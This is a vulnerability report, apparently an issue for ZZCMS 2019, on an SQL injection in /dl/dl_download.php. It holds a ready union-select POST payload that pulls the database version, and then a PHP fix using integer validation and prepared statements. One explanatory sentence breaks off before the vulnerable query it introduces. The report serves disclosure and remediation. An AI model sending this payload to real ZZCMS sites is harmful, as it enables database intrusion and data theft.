0x01 Vulnerability (/dl/dl_download.php line 67 ~ 71)
If the index of the ',' value in the id parameter is bigger than 0, the sql will be
When we check the query, there are no single quotes around the id parameter, so we can inject
any query through the id parameter.
There is no security filter for the id parameter, which means we can inject an SQL query via the id parameter if we append a ',' value to the end of the id parameter.
0x02 payload
Send the "POC" value below as POST data to "/dl/dl_download.php".
POC : union SQL injection
menu1=%3Fb%3D123%26province%3D%26city%3D%26keyword%3D%26page_size%3D2&FileExt=xls&sql=select+count%28*%29+as+total+from+zzcms_dl+where+classid%3D1+&chkAll=checkbox&id%5B%5D=1) union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,version(),0,1,2,3-- a,
Link Url : http://www.zzcms.net/about/6.htm
Edition : ZZCMS2018升2019 (2019-01-11)
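The corrective pattern for the flaw reported above, added here as an example and not taken from ZZCMS: validate every id as an integer and bind it through a prepared statement instead of concatenating it unquoted into the query. The `IN (...)` query shape, the `cp` column, and the use of PDO with in-memory SQLite are assumptions made for illustration.

```php
<?php
// Added example, not ZZCMS code. The IN (...) query shape and the `cp` column
// are assumptions; zzcms_dl is the table named in the issue's POST data.

// Accept id[]=1&id[]=2 or a comma-joined string; return validated integers.
function parse_id_list($raw): array
{
    $parts = is_array($raw) ? $raw : explode(',', (string)$raw);
    $ids = [];
    foreach ($parts as $p) {
        $p = trim((string)$p);
        if ($p === '') {
            continue; // tolerate a trailing ','
        }
        $n = filter_var($p, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($n === false) {
            throw new InvalidArgumentException('id must be a positive integer');
        }
        $ids[] = $n;
    }
    if ($ids === []) {
        throw new InvalidArgumentException('no ids supplied');
    }
    return $ids;
}

// One bound placeholder per validated id; no request data enters the SQL text.
function fetch_rows(PDO $db, $raw): array
{
    $ids = parse_id_list($raw);
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("SELECT id, cp FROM zzcms_dl WHERE id IN ($marks)");
    $stmt->execute($ids);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in an in-memory SQLite database (assumption: PDO).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE zzcms_dl (id INTEGER PRIMARY KEY, cp TEXT)');
$db->exec("INSERT INTO zzcms_dl (id, cp) VALUES (1, 'a'), (2, 'b'), (3, 'c')");

echo count(fetch_rows($db, '1,3,')), " row(s) for a legitimate list\n";
try {
    fetch_rows($db, ['1) union select 1,2-- a,']); // same shape as the POC value
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The integer check alone closes this particular hole, and the bound placeholders keep the query safe even if the validation is later loosened.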